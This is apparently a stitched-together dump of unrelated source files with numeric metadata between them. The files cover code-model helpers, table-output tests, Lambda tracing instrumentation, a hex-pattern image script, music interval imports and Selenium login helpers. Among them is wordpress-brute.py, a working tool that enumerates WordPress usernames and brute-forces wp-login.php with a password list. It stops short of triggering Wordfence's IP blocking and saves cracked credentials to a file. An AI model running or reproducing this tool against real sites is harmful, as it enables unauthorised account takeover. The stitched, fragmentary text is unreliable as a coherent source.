__len__(self): """Return the length of all blocks combined.""" n = len(self.body) + len(self.catches) + len(self.finally_body) n += sum(map(len, self.catches)) return n def __repr__(self): """Return a string representation of this object.""" return 'try {} {} {}'.format(self.body, self.catches, self.finally_body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. 
""" spaces = ' ' * indent pretty = spaces + 'try:\n' pretty += self.body.pretty_str(indent=indent + 2) for block in self.catches: pretty += '\n' + block.pretty_str(indent) if len(self.finally_body) > 0: pretty += '\n{}finally:\n'.format(spaces) pretty += self.finally_body.pretty_str(indent=indent + 2) return pretty class CodeCatchBlock(CodeStatement, CodeStatementGroup): """Helper class for catch statements within a try-catch block.""" def __init__(self, scope, parent): """Constructor for catch block structures.""" CodeStatement.__init__(self, scope, parent) self.declarations = None self.body = CodeBlock(scope, self, explicit=True) def _set_declarations(self, declarations): """Set declarations local to this catch block.""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_body(self, body): """Set the main body of the catch block.""" assert isinstance(body, CodeBlock) self.body = body def _children(self): """Yield all direct children of this object.""" if isinstance(self.declarations, CodeStatement): yield self.declarations for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return 'catch ({}) {}'.format(self.declarations, self.body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent decls = ('...' if self.declarations is None else self.declarations.pretty_str()) body = self.body.pretty_str(indent=indent + 2) pretty = '{}catch ({}):\n{}'.format(spaces, decls, body) return pretty ############################################################################### # Helpers ############################################################################### def pretty_str(something, indent=0): """Return a human-readable string representation of an object. Uses `pretty_str` if the given value is an instance of `CodeEntity` and `repr` otherwise. Args: something: Some value to convert. Kwargs: indent (int): The amount of spaces to use as indentation. """ if isinstance(something, CodeEntity): return something.pretty_str(indent=indent) else: return (' ' * indent) + repr(something)
35.889841
81
0.60325
6,906
58,644
5.038952
0.082682
0.034771
0.02138
0.025662
0.571281
0.507141
0.465732
0.430616
0.409926
0.393575
0
0.001641
0.293602
58,644
1,633
82
35.911819
0.838387
0.427819
0
0.487805
0
0
0.024693
0
0
0
0
0
0.032999
1
0.220947
false
0.012912
0
0.002869
0.407461
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
fc4647689f1b8d8a1248e0d89dd5fa8d84dedfbf
350
py
Python
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
def is_even(i: int) -> bool:
    if i == 1:
        return False
    elif i == 2:
        return True
    elif i == 3:
        return False
    elif i == 4:
        return True
    elif i == 5:
        ...


# Never do that! Use one of these instead...
is_even = lambda i : i % 2 == 0
is_even = lambda i : not i & 1
is_odd = lambda i : not is_even(i)
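A small sketch, not part of the original file: it checks that the modulo and bitwise one-liners agree, including for negative integers, where Python's `%` still yields 0 or 1 so both report the same parity.

# Quick self-check of the two parity one-liners (illustrative only).
is_even_mod = lambda i: i % 2 == 0
is_even_bit = lambda i: not i & 1

for n in range(-5, 6):
    assert is_even_mod(n) == is_even_bit(n)
print("both parity checks agree on -5..5")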
20.588235
44
0.511429
59
350
2.949153
0.474576
0.137931
0.08046
0.183908
0
0
0
0
0
0
0
0.036364
0.371429
350
17
45
20.588235
0.754545
0.12
0
0.285714
0
0
0
0
0
0
0
0
0
1
0.071429
false
0
0
0
0.357143
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc46a91fda80741480960994acf3dbc98c9e618b
8,886
py
Python
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
1
2020-07-27T11:30:23.000Z
2020-07-27T11:30:23.000Z
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
null
null
null
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
1
2020-05-17T12:40:13.000Z
2020-05-17T12:40:13.000Z
#!/usr/bin/env python # # Wordpress Bruteforce Tool # # By @random_robbie # # import requests import json import sys import argparse import re import os.path from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) session = requests.Session() parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL") parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File") args = parser.parse_args() url = args.url passfile = args.file http_proxy = "" proxyDict = { "http" : http_proxy, "https" : http_proxy, "ftp" : http_proxy } # Grab Wordpress Users via Wordpress JSON api def grab_users_api(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict) if 'rest_user_cannot_view' in response.text: print ("[-] REST API Endpoint Requires Permissions [-]") return False if response.status_code == 404: print ("[-] Rest API Endpoint returns 404 Not Found [-]") return False elif response.status_code == 200: jsonstr = json.loads(response.content) return jsonstr # Grab Wordpress Users via Sitemap def grab_users_sitemap(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: return response.text # Grab Wordpress Users via RSS Feed def grab_users_rssfeed(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: if "dc:creator" in response.text: return response.text # Check we can get to wp-admin login. 
def check_wpadmin(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict) if "Powered by WordPress" in response.text: if "wp-submit" in response.text: if "reCAPTCHA" not in response.text: return True else: return False else: return False else: return False # Check URL is wordpress def check_is_wp(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict) if "wp-content" in response.text: return True else: return False # Check if wordfence is installed as this limits the logins to 20 per ip def check_wordfence(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict) if "Wordfence Security - Firewall & Malware Scan" in response.text: return True else: return False # Test the logins def test_login (url,user,password,cnt,attempts): if str(cnt) == attempts: print("[-] Stopping as Wordfence will block your IP [-]") sys.exit(0) paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"} headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} cookies = {"wordpress_test_cookie":"WP+Cookie+check"} response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False) if response.status_code == 503: print("[-] Website is giving 503 HTTP Status [-]") sys.exit(0) if response.status_code == 502: print("[-] Website is giving 502 HTTP Status [-]") sys.exit(0) if response.status_code == 403: print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]") sys.exit(0) if "Google Authenticator code" in response.text: print("[-] 2FA is enabled Sorry [-]") sys.exit(0) if "wordpress_logged_in" in response.headers['Set-Cookie']: print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]") text_file = open("found.txt", "a") text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n") text_file.close() sys.exit(0) else: print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]") cnt += 1 return cnt def count_pass(passfile): count = 0 with open(passfile, 'r') as f: for line in f: count += 1 f.close() return str(count) # Dont no body like dupes. 
def remove_dupes(): lines_seen = set() outfile = open("users.txt", "w") for line in open("rssusers.txt", "r"): if line not in lines_seen: outfile.write(line) lines_seen.add(line) outfile.close() def attack_restapi(url,attempts,userdata,passfile): for id in userdata: user = id['slug'] cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() def attack_rssfeed(url,attempts,userdata,passfile): users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata) if os.path.exists("rssusers.txt"): os.remove("rssusers.txt") if os.path.exists("users.txt"): os.remove("users.txt") for user in users: u = user.replace("[CDATA[","") text_file = open("rssusers.txt", "a") text_file.write(""+str(u)+"\n") text_file.close() remove_dupes() with open("users.txt", 'r') as f: for line in f: user = line.strip() cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as b: for line in b: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() b.close() def attack_sitemap(url,attempts,userdata,passfile): auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata) for user in auth: thisuser = user[1] h = thisuser.split('/') user = h[4] cnt = 1 with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() # Time For Some Machine Learning Quality IF statements. def basic_checks(url): if check_is_wp(url): if check_wpadmin(url): return True else: return False else: return False if basic_checks(url): print("[+] Confirmed Wordpress Website [+]") else: print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]") sys.exit(0) if os.path.isfile(passfile) and os.access(passfile, os.R_OK): print("[+] Password List Used: "+passfile+" [+]") else: print("[-] Either the file is missing or not readable [-]") sys.exit(0) # Method Value for which method to enumerate users from method = "None" attempts = "None" # Which method to use for enumeration if grab_users_api(url): print("[+] Users found via Rest API [-]") method = "restapi" if grab_users_rssfeed(url) and method == "None": print("[+] Users found via RSS Feed [+]") method = "rss" if grab_users_sitemap(url) and method == "None": print("[+] Users found via Authors Sitemap [-]") method = "sitemap" if method == "None": print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]") sys.exit(0) if check_wordfence(url): print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]") attempts = "20" # Kick off Parsing and attacking if method == "restapi": userdata = grab_users_api(url) attack_restapi(url,attempts,userdata,passfile) if method == "rss": userdata = grab_users_rssfeed(url) attack_rssfeed(url,attempts,userdata,passfile) if method == "sitemap": userdata = grab_users_sitemap(url) attack_sitemap(url,attempts,userdata,passfile)
31.399293
388
0.679721
1,289
8,886
4.624515
0.223429
0.007046
0.027177
0.019963
0.41436
0.393055
0.33954
0.296427
0.241738
0.228988
0
0.028727
0.153838
8,886
282
389
31.510638
0.764064
0.059419
0
0.344498
0
0.043062
0.325699
0.039333
0
0
0
0
0
1
0.062201
false
0.124402
0.033493
0
0.191388
0.095694
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc49b99b0326493e147f5f9c2af303341e2290ed
2,422
py
Python
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- """Test the terminaltables output adapter.""" from __future__ import unicode_literals from textwrap import dedent import pytest from cli_helpers.compat import HAS_PYGMENTS from cli_helpers.tabular_output import terminaltables_adapter if HAS_PYGMENTS: from pygments.style import Style from pygments.token import Token def test_terminal_tables_adapter(): """Test the terminaltables output adapter.""" data = [['abc', 1], ['d', 456]] headers = ['letters', 'number'] output = terminaltables_adapter.adapter( iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ +---------+--------+ | letters | number | +---------+--------+ | abc | 1 | | d | 456 | +---------+--------+''') @pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library') def test_style_output_table(): """Test that *style_output_table()* styles the output table.""" class CliStyle(Style): default_style = "" styles = { Token.Output.TableSeparator: '#ansired', } headers = ['h1', 'h2'] data = [['观音', '2'], ['Ποσειδῶν', 'b']] style_output_table = terminaltables_adapter.style_output_table('ascii') style_output_table(data, headers, style=CliStyle) output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ \x1b[31;01m+\x1b[39;00m''' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' + ''' h2 \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' + ''' 2 \x1b[31;01m|\x1b[39;00m \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' + ''' b \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '\x1b[31;01m+\x1b[39;00m')
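A minimal sketch, assuming cli_helpers and its terminaltables backend are installed: the same adapter call exercised by the first test above, used outside pytest to print the ASCII table directly.

from cli_helpers.tabular_output import terminaltables_adapter

data = [['abc', 1], ['d', 456]]
headers = ['letters', 'number']

# Same call as in test_terminal_tables_adapter(); the adapter returns an
# iterable of output that the test joins with newlines before comparing.
output = terminaltables_adapter.adapter(iter(data), headers,
                                        table_format='ascii')
print('\n'.join(output))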
34.6
86
0.547069
316
2,422
4.091772
0.218354
0.092807
0.148492
0.204176
0.492653
0.440062
0.402939
0.402939
0.402939
0.402939
0
0.143322
0.239472
2,422
69
87
35.101449
0.558632
0.066061
0
0.306122
0
0
0.305112
0.159212
0
0
0
0
0.040816
1
0.040816
false
0
0.142857
0
0.244898
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc557f84938097fbd8c0d95d4d05c57f1ad0bde0
4,093
py
Python
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
null
null
null
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
null
null
null
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
1
2021-01-24T12:08:18.000Z
2021-01-24T12:08:18.000Z
# Copyright 2020, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# TODO: usage
"""
The opentelemetry-instrumentation-aws-lambda package allows tracing AWS
Lambda functions.

Usage
-----

.. code:: python

    # Copy this snippet into an AWS Lambda function
    # Ref Doc: https://docs.aws.amazon.com/lambda/latest/dg/lambda-python.html

    import boto3
    from opentelemetry.instrumentation.aws_lambda import (
        AwsLambdaInstrumentor
    )

    # Enable instrumentation
    AwsLambdaInstrumentor().instrument()

    # Lambda function
    def lambda_handler(event, context):
        s3 = boto3.resource('s3')
        for bucket in s3.buckets.all():
            print(bucket.name)

        return "200 OK"

API
---
"""

import logging
import os
from importlib import import_module

from wrapt import wrap_function_wrapper

# TODO: aws propagator
from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import (
    AwsXRayFormat,
)
from opentelemetry.instrumentation.aws_lambda.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.utils import unwrap
from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider

logger = logging.getLogger(__name__)


class AwsLambdaInstrumentor(BaseInstrumentor):
    def _instrument(self, **kwargs):
        self._tracer = get_tracer(__name__, __version__, kwargs.get("tracer_provider"))
        self._tracer_provider = get_tracer_provider()

        lambda_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER"))
        wrapped_names = lambda_handler.rsplit(".", 1)
        self._wrapped_module_name = wrapped_names[0]
        self._wrapped_function_name = wrapped_names[1]

        wrap_function_wrapper(
            self._wrapped_module_name,
            self._wrapped_function_name,
            self._functionPatch,
        )

    def _uninstrument(self, **kwargs):
        unwrap(
            import_module(self._wrapped_module_name),
            self._wrapped_function_name,
        )

    def _functionPatch(self, original_func, instance, args, kwargs):
        lambda_context = args[1]
        ctx_aws_request_id = lambda_context.aws_request_id
        ctx_invoked_function_arn = lambda_context.invoked_function_arn
        orig_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER"))

        # TODO: enable propagation from AWS via an env variable
        xray_trace_id = os.environ.get("_X_AMZN_TRACE_ID", "")

        lambda_name = os.environ.get("AWS_LAMBDA_FUNCTION_NAME")
        function_version = os.environ.get("AWS_LAMBDA_FUNCTION_VERSION")

        propagator = AwsXRayFormat()
        parent_context = propagator.extract({"X-Amzn-Trace-Id": xray_trace_id})

        with self._tracer.start_as_current_span(
            name=orig_handler, context=parent_context, kind=SpanKind.SERVER
        ) as span:
            # Refer: https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/faas.md#example
            span.set_attribute("faas.execution", ctx_aws_request_id)
            span.set_attribute("faas.id", ctx_invoked_function_arn)

            # TODO: fix in Collector because these belong to resource attributes
            span.set_attribute("faas.name", lambda_name)
            span.set_attribute("faas.version", function_version)

            result = original_func(*args, **kwargs)

            # force_flush before the function quits, in case the Lambda environment freezes.
            self._tracer_provider.force_flush()

        return result
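The wrapper above resolves which function to patch from the ORIG_HANDLER (falling back to _HANDLER) environment variable and splits it into a module path and a function name. As a rough illustration of that wiring only — "my_module.lambda_handler" is a made-up handler path, not part of the package, and the module would have to be importable for instrument() to succeed:

# Illustrative sketch, not part of the original file.
import os

# The user's real handler; the Lambda runtime itself is normally pointed at a shim.
os.environ["ORIG_HANDLER"] = "my_module.lambda_handler"

from opentelemetry.instrumentation.aws_lambda import AwsLambdaInstrumentor

# _instrument() splits "my_module.lambda_handler" into module "my_module" and
# function "lambda_handler", then wraps that function with _functionPatch.
AwsLambdaInstrumentor().instrument()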
34.108333
151
0.716101
497
4,093
5.647887
0.382294
0.022444
0.029925
0.027075
0.133951
0.086926
0.066263
0.066263
0.034913
0.034913
0
0.006096
0.198387
4,093
119
152
34.394958
0.849436
0.374786
0
0.04
0
0
0.07109
0.020142
0
0
0
0.016807
0
1
0.06
false
0
0.2
0
0.3
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
fc62c8d6aa28b5a801e73fa4abc1d1fe577304dd
1,884
py
Python
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
from PIL import ImageDraw, Image
from math import cos, sin, radians
from random import randint
import sys

a = "a0A1b2B3c4C5d6D7e8E9f!F,g.G/h?H<i>I:j;J'k\"K\\l|L/m M\nn\tN@o#O$p%P^q&Q*r(R)s_S-t+T=u{U}v[V]w W x X y Y z Z"

if len(a) > 128:
    print("TOO MANY CHARACTERS")
    sys.exit(1)

# for i in a:
#     print("%s -> %d %d %d %d %d %d %d " % (i,
#         1 if a.index(i) & 1 == 1 else 0,
#         1 if a.index(i) & 2 == 2 else 0,
#         1 if a.index(i) & 4 == 4 else 0,
#         1 if a.index(i) & 8 == 8 else 0,
#         1 if a.index(i) & 16 == 16 else 0,
#         1 if a.index(i) & 32 == 32 else 0,
#         1 if a.index(i) & 64 == 64 else 0,
#     ))
# sys.exit(0)

WHITE = (255, 255, 255)
PINK = (217, 154, 197)
BLUE = (103, 170, 249)
BLACK = (0, 0, 0)

img = Image.new('RGB', (2560, 1600), BLACK)
id = ImageDraw.Draw(img)


def hex(offset, size):
    # Return the corner points of a hexagon traced from `offset`.
    points = []
    x, y = offset
    for angle in range(0, 360, 60):
        x += cos(radians(angle)) * size
        y += sin(radians(angle)) * size
        points.append((x, y))
    return points


def drawHex(id, sx, sy, s, c):
    # Draw seven hexagons; each one is BLUE or PINK depending on one bit of `c`.
    ox = sx - cos(radians(120)) * s
    oy = sy - sin(radians(120)) * s
    id.polygon(hex((ox - s, oy - s * 2), s), fill=BLUE if c & 1 == 1 else PINK)
    id.polygon(hex((ox + s, oy - s * 2), s), fill=BLUE if c & 2 == 2 else PINK)
    id.polygon(hex((ox - s * 2, oy), s), fill=BLUE if c & 4 == 4 else PINK)
    id.polygon(hex((ox, oy), s), fill=BLUE if c & 8 == 8 else PINK)
    id.polygon(hex((ox + s * 2, oy), s), fill=BLUE if c & 16 == 16 else PINK)
    id.polygon(hex((ox - s, oy + s * 2), s), fill=BLUE if c & 32 == 32 else PINK)
    id.polygon(hex((ox + s, oy + s * 2), s), fill=BLUE if c & 64 == 64 else PINK)


q = """This is a test
0123456789%"""

s = 10
cutOff = int(2560 / (s * 7))
print(cutOff)
x, y = 0, 0
for c in q:
    drawHex(id, s * 2 + x * s * 7, s * 3 + y * s * 7, s, a.index(c))
    x += 1
    if x >= cutOff or c == "\n":
        x, y = 0, y + 1

img.show()
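Each character is looked up in the alphabet string `a`, and its index is rendered as seven hexagons, one per bit, with set bits drawn in BLUE. A quick way to see which hexagons light up for a given character is to print its bit pattern; this small check script is not part of the original image code and only assumes the same alphabet string:

# Standalone check, assuming the same alphabet string `a` used above.
a = "a0A1b2B3c4C5d6D7e8E9f!F,g.G/h?H<i>I:j;J'k\"K\\l|L/m M\nn\tN@o#O$p%P^q&Q*r(R)s_S-t+T=u{U}v[V]w W x X y Y z Z"

def bits_for(c):
    # Return which of the seven bit positions (1, 2, 4, 8, 16, 32, 64) are set
    # for this character's index, i.e. which hexagons drawHex would paint BLUE.
    value = a.index(c)
    return [bit for bit in (1, 2, 4, 8, 16, 32, 64) if value & bit]

print(bits_for('T'))
print(bits_for(' '))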
28.545455
113
0.537686
396
1,884
2.555556
0.270202
0.023715
0.027668
0.062253
0.362648
0.352767
0.310277
0.221344
0.221344
0.221344
0
0.107397
0.253716
1,884
66
114
28.545455
0.612376
0.196921
0
0
0
0.204545
0.061252
0.027963
0
0
0
0
0
1
0.045455
false
0
0.090909
0
0.159091
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc66cd08fbbe334f7cc1e76eb76063eb07e5b49e
673
py
Python
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
""" *mus . it . dia* The simple diatonic intervals. """ from .second import MinorSecond from .second import MajorSecond from .third import MinorThird from .third import MajorThird from .fourth import PerfectFourth from .fifth import Tritone from .fifth import PerfectFifth from .sixth import MinorSixth from .sixth import MajorSixth from .seventh import MinorSeventh from .seventh import MajorSeventh from .eighth import Octave __all__ = [ "MinorSecond", "MajorSecond", "MinorThird", "MajorThird", "PerfectFourth", "Tritone", "PerfectFifth", "MinorSixth", "MajorSixth", "MinorSeventh", "MajorSeventh", "Octave", ]
18.694444
33
0.708767
68
673
6.955882
0.426471
0.042283
0.067653
0
0
0
0
0
0
0
0
0
0.199108
673
35
34
19.228571
0.877551
0.071322
0
0
0
0
0.203612
0
0
0
0
0
0
1
0
false
0
0.461538
0
0.461538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
fc6780fb69ebe4416f273d6821ceb9f2cb3226e8
760
py
Python
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
# this file holds some common testing functions
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By

depurl = "localhost:3000"


def getElement(driver, xpath):
    # Wait up to 10 seconds for the element located by `xpath` to be present.
    return WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, xpath)))


def login(driver, username, password):
    driver.get(depurl)
    elem = getElement(driver, "//input[@id='username']")
    elem.clear()
    elem.send_keys(username)
    elem = getElement(driver, "//input[@id='password']")
    elem.clear()
    elem.send_keys(password)
    elem.send_keys(Keys.RETURN)


def logout(driver):
    elem = getElement(driver, "//a[text()='Logout']")
    elem.click()
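A hedged example of how these helpers might be called from a test; the browser setup, import path, and credentials below are illustrative assumptions, not part of the file above:

# Illustrative usage sketch only.
from selenium import webdriver
from selenium_tests.test_functions import login, logout  # assumed import path for the helpers above

def test_login_logout_sketch():
    driver = webdriver.Firefox()  # any WebDriver would do
    try:
        login(driver, "testuser", "testpassword")  # fills the username/password inputs and submits
        logout(driver)                             # clicks the Logout link once logged in
    finally:
        driver.quit()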
33.043478
93
0.727632
98
760
5.571429
0.479592
0.117216
0.115385
0.102564
0.175824
0
0
0
0
0
0
0.009146
0.136842
760
23
94
33.043478
0.823171
0.059211
0
0.111111
0
0
0.112045
0.064426
0
0
0
0
0
1
0.166667
false
0.166667
0.166667
0.055556
0.388889
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc69e76506c689aa4c8cc54b37cd338453f7483a
1,256
py
Python
scripts/convert_keras2onnx.py
ecmwf-lab/infero
4fec006175af48cd0313b2f89722c01636e961db
[ "Apache-2.0" ]
8
2021-12-20T06:24:16.000Z
2022-02-17T15:21:55.000Z
scripts/convert_keras2onnx.py
ecmwf-projects/infero
4c229a16ce75a249c83cbf43e0c953a7a42f2f83
[ "Apache-2.0" ]
null
null
null
scripts/convert_keras2onnx.py
ecmwf-projects/infero
4c229a16ce75a249c83cbf43e0c953a7a42f2f83
[ "Apache-2.0" ]
1
2021-10-04T10:14:23.000Z
2021-10-04T10:14:23.000Z
#
# (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
